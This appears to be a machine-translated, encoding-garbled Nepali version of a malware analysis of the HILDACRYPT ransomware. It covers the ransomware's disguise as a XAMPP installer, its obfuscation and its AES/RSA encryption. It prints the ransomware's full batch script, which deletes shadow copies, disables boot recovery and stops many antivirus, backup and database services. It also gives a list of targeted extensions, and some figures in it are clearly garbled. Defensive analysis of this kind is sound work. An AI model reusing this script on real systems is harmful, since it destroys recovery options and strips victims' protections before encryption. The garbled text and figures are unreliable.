рдирдорд╕реНрддреЗ, Habr! рдПрдХ рдкрдЯрдХ рдлреЗрд░рд┐, рд╣рд╛рдореА Ransomware рд╢реНрд░реЗрдгреА рдмрд╛рдЯ рдорд╛рд▓рд╡реЗрдпрд░ рдХреЛ рдирд╡реАрдирддрдо рд╕рдВрд╕реНрдХрд░рдг рдХреЛ рдмрд╛рд░реЗ рдорд╛ рдХреБрд░рд╛ рдЧрд░реНрджреИрдЫреМрдВред HILDACRYPT рдПрдЙрдЯрд╛ рдирдпрд╛рдБ ransomware рд╣реЛ, рдЕрдЧрд╕реНрдЯ 2019 рдорд╛ рдлреЗрд▓рд╛ рдкрд░реЗрдХреЛ Hilda рдкрд░рд┐рд╡рд╛рд░рдХреЛ рд╕рджрд╕реНрдп, рд╕рдлреНрдЯрд╡реЗрдпрд░ рд╡рд┐рддрд░рдг рдЧрд░реНрди рдкреНрд░рдпреЛрдЧ рдЧрд░рд┐рдПрдХреЛ Netflix рдХрд╛рд░реНрдЯреБрдирдХреЛ рдирд╛рдордмрд╛рдЯ рдирд╛рдордХрд░рдг рдЧрд░рд┐рдПрдХреЛ рд╣реЛред рдЖрдЬ рд╣рд╛рдореА рдпрд╕ рдЕрдкрдбреЗрдЯ рдЧрд░рд┐рдПрдХреЛ ransomware рднрд╛рдЗрд░рд╕рдХреЛ рдкреНрд░рд╛рд╡рд┐рдзрд┐рдХ рд╕реБрд╡рд┐рдзрд╛рд╣рд░реВрдХреЛ рдмрд╛рд░реЗрдорд╛ рдкрд░рд┐рдЪрд┐рдд рд╣реБрдБрджреИрдЫреМрдВред
Hilda ransomware рдХреЛ рдкрд╣рд┐рд▓реЛ рд╕рдВрд╕реНрдХрд░рдгрдорд╛, Youtube рдорд╛ рдкреЛрд╕реНрдЯ рдЧрд░рд┐рдПрдХреЛ рдПрдХ рд▓рд┐рдЩреНрдХ рдлрд┐рд░реМрддреА рдкрддреНрд░рдорд╛ рдХрд╛рд░реНрдЯреБрди рд╢реНрд░реГрдВрдЦрд▓рд╛ рд╕рдорд╛рд╡реЗрд╢ рдерд┐рдпреЛред HILDACRYPT рд▓реЗ рдПрдХ рд╡реИрдз XAMPP рд╕реНрдерд╛рдкрдирд╛рдХрд░реНрддрд╛рдХреЛ рд░реВрдкрдорд╛ рдорд╛рд╕реНрдХрд░реЗрдб рдЧрд░реНрджрдЫ, рдорд╛рд░рд┐рдпрд╛рдбреАрдмреА, PHP, рд░ рдкрд░реНрд▓ рд╕рдорд╛рд╡реЗрд╢ рдЧрд░реНрдиреЗ рдПрдХ рд╕рдЬрд┐рд▓реЛ-рдЧрд░реНрди-рд╕реНрдерд╛рдкрдирд╛ рдЕрдкрд╛рдЪреЗ рд╡рд┐рддрд░рдгред рдПрдХреИ рд╕рдордпрдорд╛, рдХреНрд░рд┐рдкреНрдЯреЛрд▓реЛрдХрд░рд╕рдБрдЧ рдлрд░рдХ рдлрд╛рдЗрд▓ рдирд╛рдо рдЫ - xampред рдердк рд░реВрдкрдорд╛, ransomware рдлрд╛рдЗрд▓рдорд╛ рдЗрд▓реЗрдХреНрдЯреНрд░реЛрдирд┐рдХ рд╣рд╕реНрддрд╛рдХреНрд╖рд░ рд╣реБрдБрджреИрдиред
рд╕реНрдерд┐рд░ рд╡рд┐рд╢реНрд▓реЗрд╖рдг
ransomware MS Windows рдХреЛ рд▓рд╛рдЧрд┐ рд▓реЗрдЦрд┐рдПрдХреЛ PE32 .NET рдлрд╛рдЗрд▓рдорд╛ рд╕рдорд╛рд╡реЗрд╢ рдЫред рдпрд╕рдХреЛ рд╕рд╛рдЗрдЬ 135 рдмрд╛рдЗрдЯреНрд╕ рд╣реЛред рджреБрдмреИ рдореБрдЦреНрдп рдХрд╛рд░реНрдпрдХреНрд░рдо рдХреЛрдб рд░ рдбрд┐рдлреЗрдиреНрдбрд░ рдкреНрд░реЛрдЧреНрд░рд╛рдо рдХреЛрдб C# рдорд╛ рд▓реЗрдЦрд┐рдПрдХреЛ рдЫред рд╕рдВрдХрд▓рди рдорд┐рддрд┐ рд░ рд╕рдордп рдЯрд┐рдХрдЯ рдЕрдиреБрд╕рд╛рд░, рдмрд╛рдЗрдирд░реА рд╕реЗрдкреНрдЯреЗрдореНрдмрд░ 168, 14 рдорд╛ рд╕рд┐рд░реНрдЬрдирд╛ рдЧрд░рд┐рдПрдХреЛ рдерд┐рдпреЛред
Detect It Easy рдХреЛ рдЕрдиреБрд╕рд╛рд░, ransomware рдХрдиреНрдлреНрдпреБрдЬрд░ рд░ ConfuserEx рдХреЛ рдкреНрд░рдпреЛрдЧ рдЧрд░реЗрд░ рд╕рдВрдЧреНрд░рд╣ рдЧрд░рд┐рдПрдХреЛ рдЫ, рддрд░ рдпреА obfuscators рдкрд╣рд┐рд▓реЗ рдЬрд╕реНрддреИ рдЫрдиреН, ConfuserEx рдорд╛рддреНрд░ рдХрдиреНрдлреНрдпреБрдЬрд░ рдХреЛ рдЙрддреНрддрд░рд╛рдзрд┐рдХрд╛рд░реА рд╣реЛ, рддреНрдпрд╕реИрд▓реЗ рддрд┐рдиреАрд╣рд░реВрдХреЛ рдХреЛрдб рд╣рд╕реНрддрд╛рдХреНрд╖рд░ рд╕рдорд╛рди рдЫрдиреНред
HILDACRYPT рд╡рд╛рд╕реНрддрд╡рдорд╛ ConfuserEx рд╕рдБрдЧ рдкреНрдпрд╛рдХреЗрдЬ рдЧрд░рд┐рдПрдХреЛ рдЫред
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
рдЖрдХреНрд░рдордг рд╡реЗрдХреНрдЯрд░
рд╕рдореНрднрд╡рддрдГ, ransomware рд╡реЗрдм рдкреНрд░реЛрдЧреНрд░рд╛рдорд┐рдЩ рд╕рд╛рдЗрдЯрд╣рд░реВ рдордзреНрдпреЗ рдПрдХрдорд╛ рдкрддреНрддрд╛ рд▓рдЧрд╛рдЗрдПрдХреЛ рдерд┐рдпреЛ, рд╡реИрдз XAMPP рдХрд╛рд░реНрдпрдХреНрд░рдордХреЛ рд░реВрдкрдорд╛ рдореБрдЦреМрдЯрд╛ рдЧрд░реНрджреИред
рд╕рдВрдХреНрд░рдордгрдХреЛ рд╕рдореНрдкреВрд░реНрдг рд╢реНрд░реГрдВрдЦрд▓рд╛рдорд╛ рджреЗрдЦреНрди рд╕рдХрд┐рдиреНрдЫ .
рдЕрд╕реНрдкрд╖реНрдЯрддрд╛
ransomware рд╕реНрдЯреНрд░рд┐рдЩрд╣рд░реВ рдЗрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рдлрд╛рд░рдордорд╛ рднрдгреНрдбрд╛рд░рдг рдЧрд░рд┐рдПрдХрд╛ рдЫрдиреНред рдЬрдм рд╕реБрд░реБ рднрдпреЛ, HILDACRYPT рд▓реЗ Base64 рд░ AES-256-CBC рдкреНрд░рдпреЛрдЧ рдЧрд░реЗрд░ рддрд┐рдиреАрд╣рд░реВрд▓рд╛рдИ рдбрд┐рдХреНрд░рд┐рдкреНрдЯ рдЧрд░реНрдЫред
рд╕реЗрдЯрд┐рдЩ
рд╕рдмреИрднрдиреНрджрд╛ рдкрд╣рд┐рд▓реЗ, ransomware рд▓реЗ %AppDataRoaming% рдорд╛ рдПрдЙрдЯрд╛ рдлреЛрд▓реНрдбрд░ рд╕рд┐рд░реНрдЬрдирд╛ рдЧрд░реНрджрдЫ рдЬрд╕рдорд╛ GUID (Globally Unique Identifier) тАЛтАЛрдкреНрдпрд╛рд░рд╛рдорд┐рдЯрд░ рдЕрдирд┐рдпрдорд┐рдд рд░реВрдкрдорд╛ рдЙрддреНрдкрдиреНрди рд╣реБрдиреНрдЫред рдпрд╕ рд╕реНрдерд╛рдирдорд╛ рдмреНрдпрд╛рдЯ рдлрд╛рдЗрд▓ рдердкреЗрд░, ransomware рднрд╛рдЗрд░рд╕рд▓реЗ рдпрд╕рд▓рд╛рдИ cmd.exe рдкреНрд░рдпреЛрдЧ рдЧрд░реЗрд░ рд╕реБрд░реБ рдЧрд░реНрдЫ:
cmd.exe /c JKfgkgj3hjgfhjka.bat рд░ рдмрд╛рд╣рд┐рд░ рдирд┐рд╕реНрдХрдиреБрд╣реЛрд╕реН
рддреНрдпрд╕рдкрдЫрд┐ рдпрд╕рд▓реЗ рдкреНрд░рдгрд╛рд▓реА рд╕реБрд╡рд┐рдзрд╛рд╣рд░реВ рд╡рд╛ рд╕реЗрд╡рд╛рд╣рд░реВ рдЕрд╕рдХреНрд╖рдо рдЧрд░реНрди рдмреНрдпрд╛рдЪ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рдЧрд░реНрди рдерд╛рд▓реНрдЫред
рд╕реНрдХреНрд░рд┐рдкреНрдЯрд▓реЗ рдЫрд╛рдпрд╛ рдкреНрд░рддрд┐рд▓рд┐рдкрд┐рд╣рд░реВ рдирд╖реНрдЯ рдЧрд░реНрдиреЗ, SQL рд╕рд░реНрднрд░, рдмреНрдпрд╛рдХрдЕрдк рд░ рдПрдиреНрдЯрд┐рднрд╛рдЗрд░рд╕ рд╕рдорд╛рдзрд╛рдирд╣рд░реВ рдЕрд╕рдХреНрд╖рдо рдЧрд░реНрдиреЗ рдЖрджреЗрд╢рд╣рд░реВрдХреЛ рд▓рд╛рдореЛ рд╕реВрдЪреА рд╕рдорд╛рд╡реЗрд╢ рдЧрд░реНрджрдЫред
рдЙрджрд╛рд╣рд░рдгрдХрд╛ рд▓рд╛рдЧрд┐, рдпрд╕рд▓реЗ Acronis рдмреНрдпрд╛рдХрдЕрдк рд╕реЗрд╡рд╛рд╣рд░реВ рд░реЛрдХреНрди рдЕрд╕рдлрд▓ рдкреНрд░рдпрд╛рд╕ рдЧрд░реНрдЫред рдердк рд░реВрдкрдорд╛, рдпрд╕рд▓реЗ рдирд┐рдореНрди рд╡рд┐рдХреНрд░реЗрддрд╛рд╣рд░реВрдмрд╛рдЯ рдмреНрдпрд╛рдХрдЕрдк рдкреНрд░рдгрд╛рд▓реА рд░ рдПрдиреНрдЯрд┐рднрд╛рдЗрд░рд╕ рд╕рдорд╛рдзрд╛рдирд╣рд░реВрдорд╛ рдЖрдХреНрд░рдордг рдЧрд░реНрджрдЫ: Veeam, Sophos, Kaspersky, McAfee рд░ рдЕрдиреНрдпред
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop тАЬSophos Device Control ServiceтАЭ /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop тАЬZoolz 2 ServiceтАЭ /y
net stop McTaskManager /y
net stop тАЬSophos AutoUpdate ServiceтАЭ /y
net stop тАЬSophos System Protection ServiceтАЭ /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop тАЬSymantec System RecoveryтАЭ /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop тАЬSophos Health ServiceтАЭ /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop тАЬSophos Message RouterтАЭ /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop тАЬSophos Clean ServiceтАЭ /y
net stop swi_update_64 /y
net stop тАЬSophos Web Control ServiceтАЭ /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop тАЬVeeam Backup Catalog Data ServiceтАЭ /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop тАЬSophos MCS ClientтАЭ /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop тАЬSQLsafe Backup ServiceтАЭ /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop тАЬSophos Safestore ServiceтАЭ /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop тАЬSophos File Scanner ServiceтАЭ /y
net stop тАЬSophos AgentтАЭ /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop тАЬEnterprise Client ServiceтАЭ /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop тАЬSQL BackupsтАЭ /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop тАЬSophos MCS AgentтАЭ /y
net stop RESvc /y
net stop тАЬAcronis VSS ProviderтАЭ /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop тАЬSQLsafe Filter ServiceтАЭ /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
рдорд╛рдерд┐ рдЙрд▓реНрд▓рд┐рдЦрд┐рдд рд╕реЗрд╡рд╛рд╣рд░реВ рд░ рдкреНрд░рдХреНрд░рд┐рдпрд╛рд╣рд░реВ рдЕрд╕рдХреНрд╖рдо рднрдПрдкрдЫрд┐, рдХреНрд░рд┐рдкреНрдЯреЛрд▓реЛрдХрд░рд▓реЗ рд╕рдмреИ рдЖрд╡рд╢реНрдпрдХ рд╕реЗрд╡рд╛рд╣рд░реВ рдбрд╛рдЙрди рднрдПрдХреЛ рд╕реБрдирд┐рд╢реНрдЪрд┐рдд рдЧрд░реНрди рдХрд╛рд░реНрдпрд╕реВрдЪреА рдЖрджреЗрд╢ рдкреНрд░рдпреЛрдЧ рдЧрд░реЗрд░ рд╕рдмреИ рдЪрд▓рд┐рд░рд╣реЗрдХреЛ рдкреНрд░рдХреНрд░рд┐рдпрд╛рд╣рд░реВрдХреЛ рдмрд╛рд░реЗрдорд╛ рдЬрд╛рдирдХрд╛рд░реА рд╕рдЩреНрдХрд▓рди рдЧрд░реНрджрдЫред
рдХрд╛рд░реНрдпрд╕реВрдЪреА v/fo csv
рдпреЛ рдЖрджреЗрд╢рд▓реЗ рдЪрд▓рд┐рд░рд╣реЗрдХреЛ рдкреНрд░рдХреНрд░рд┐рдпрд╛рд╣рд░реВрдХреЛ рд╡рд┐рд╕реНрддреГрдд рд╕реВрдЪреА рджреЗрдЦрд╛рдЙрдБрдЫ, рдЬрд╕рдХрд╛ рддрддреНрд╡рд╣рд░реВ "," рдЪрд┐рдиреНрд╣рджреНрд╡рд╛рд░рд╛ рд╡рд┐рднрд╛рдЬрд┐рдд рд╣реБрдиреНрдЫрдиреНред
┬л┬лcsrss.exe┬╗,┬л448┬╗,┬лservices┬╗,┬л0┬╗,┬л1я┐╜896 я┐╜я┐╜┬╗,┬лunknown┬╗,┬╗я┐╜/я┐╜┬╗,┬л0:00:03┬╗,┬╗я┐╜/я┐╜┬╗┬╗
рдпреЛ рдЬрд╛рдБрдЪ рдкрдЫрд┐, ransomware рдПрдиреНрдХреНрд░рд┐рдкреНрд╢рди рдкреНрд░рдХреНрд░рд┐рдпрд╛ рд╕реБрд░реБ рд╣реБрдиреНрдЫред
рдИрдиреНрдХреНрд░рд┐рдкреНрд╢рди
рдлрд╛рдЗрд▓ рдЗрдиреНрдХреНрд░рд┐рдкреНрд╕рди
HILDACRYPT рд╣рд╛рд░реНрдб рдбреНрд░рд╛рдЗрднрдХрд╛ рд╕рдмреИ рдлреЗрд▓рд╛ рдкрд░реЗрдХрд╛ рд╕рд╛рдордЧреНрд░реАрд╣рд░реВ рдорд╛рд░реНрдлрдд рдЬрд╛рдиреНрдЫ, Recycle.Bin рд░ Reference AssembliesMicrosoft рдлреЛрд▓реНрдбрд░рд╣рд░реВ рдмрд╛рд╣реЗрдХред рдкрдЫрд┐рд▓реНрд▓реЛрдорд╛ .Net рдЕрдиреБрдкреНрд░рдпреЛрдЧрд╣рд░реВрдХреЛ рд▓рд╛рдЧрд┐ рдорд╣рддреНрд╡рдкреВрд░реНрдг dll, pdb, рдЖрджрд┐ рдлрд╛рдЗрд▓рд╣рд░реВ рдЫрдиреН рдЬрд╕рд▓реЗ ransomware рдХреЛ рд╕рдЮреНрдЪрд╛рд▓рдирд▓рд╛рдИ рдЕрд╕рд░ рдЧрд░реНрди рд╕рдХреНрдЫред рдИрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рдлрд╛рдЗрд▓рд╣рд░реВ рдЦреЛрдЬреНрдирдХреЛ рд▓рд╛рдЧрд┐, рд╡рд┐рд╕реНрддрд╛рд░рд╣рд░реВрдХреЛ рдирд┐рдореНрди рд╕реВрдЪреА рдкреНрд░рдпреЛрдЧ рдЧрд░рд┐рдиреНрдЫ:
┬л.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md┬╗
ransomware рд▓реЗ рдкреНрд░рдпреЛрдЧрдХрд░реНрддрд╛ рдлрд╛рдЗрд▓рд╣рд░реВ рдЗрдиреНрдХреНрд░рд┐рдкреНрдЯ рдЧрд░реНрди AES-256-CBC рдПрд▓реНрдЧреЛрд░рд┐рдереНрдо рдкреНрд░рдпреЛрдЧ рдЧрд░реНрджрдЫред рдХреБрдЮреНрдЬреА рдЖрдХрд╛рд░ 256 рдмрд┐рдЯ рд╣реЛ рд░ рдкреНрд░рд╛рд░рдореНрднрд┐рдХ рднреЗрдХреНрдЯрд░ (IV) рдЖрдХрд╛рд░ 16 рдмрд╛рдЗрдЯ рд╣реЛред
рдирд┐рдореНрди рд╕реНрдХреНрд░рд┐рдирд╕рдЯрдорд╛, byte_2 рд░ byte_1 рдХреЛ рдорд╛рдирд╣рд░реВ рдЕрдирд┐рдпрдорд┐рдд рд░реВрдкрдорд╛ GetBytes() рдкреНрд░рдпреЛрдЧ рдЧрд░реЗрд░ рдкреНрд░рд╛рдкреНрдд рдЧрд░рд┐рдпреЛред
рдХреБрдЮреНрдЬреА
╨Т╨Ш
рдЗрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рдлрд╛рдЗрд▓рдорд╛ HCY рд╡рд┐рд╕реНрддрд╛рд░ рдЫ!.. рдпреЛ рдПрдЙрдЯрд╛ рдЗрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рдлрд╛рдЗрд▓рдХреЛ рдЙрджрд╛рд╣рд░рдг рд╣реЛред рдорд╛рдерд┐ рдЙрд▓реНрд▓реЗрдЦрд┐рдд рдХреБрдЮреНрдЬреА рд░ IV рдпрд╕ рдлрд╛рдЗрд▓рдХреЛ рд▓рд╛рдЧрд┐ рд╕рд┐рд░реНрдЬрдирд╛ рдЧрд░рд┐рдПрдХреЛ рдерд┐рдпреЛред
рдХреБрдЮреНрдЬреА рдЗрдиреНрдХреНрд░рд┐рдкреНрд╕рди
рдХреНрд░рд┐рдкреНрдЯреЛрд▓рдХрд░рд▓реЗ рдПрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рдлрд╛рдЗрд▓рдорд╛ рдЙрддреНрдкрдиреНрди AES рдХреБрдЮреНрдЬреА рднрдгреНрдбрд╛рд░рдг рдЧрд░реНрджрдЫред рдПрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рдлрд╛рдЗрд▓рдХреЛ рдкрд╣рд┐рд▓реЛ рднрд╛рдЧрдорд╛ рд╣реЗрдбрд░ рд╣реБрдиреНрдЫ рдЬрд╕рдорд╛ рдбреЗрдЯрд╛ рд╕рдорд╛рд╡реЗрд╢ рд╣реБрдиреНрдЫ рдЬрд╕реНрддреИ HILDACRYPT, KEY, IV, FileLen XML рдврд╛рдБрдЪрд╛рдорд╛, рд░ рдпреЛ рдЬрд╕реНрддреЛ рджреЗрдЦрд┐рдиреНрдЫ:
AES рд░ IV рдХреБрдЮреНрдЬреА рдЗрдиреНрдХреНрд░рд┐рдкреНрд╕рди RSA-2048 рдкреНрд░рдпреЛрдЧ рдЧрд░реА рдЧрд░рд┐рдиреНрдЫ, рд░ рдЗрдиреНрдХреЛрдбрд┐рдЩ Base64 рдкреНрд░рдпреЛрдЧ рдЧрд░реА рдЧрд░рд┐рдиреНрдЫред RSA рд╕рд╛рд░реНрд╡рдЬрдирд┐рдХ рдХреБрдЮреНрдЬреА XML рдврд╛рдБрдЪрд╛рдорд╛ рдПрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рд╕реНрдЯреНрд░рд┐рдЩрд╣рд░реВ рдордзреНрдпреЗ рдПрдХрдорд╛ рдХреНрд░рд┐рдкреНрдЯреЛрд▓рдХрд░рдХреЛ рдореБрдЦреНрдп рднрд╛рдЧрдорд╛ рднрдгреНрдбрд╛рд░ рдЧрд░рд┐рдПрдХреЛ рдЫред
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
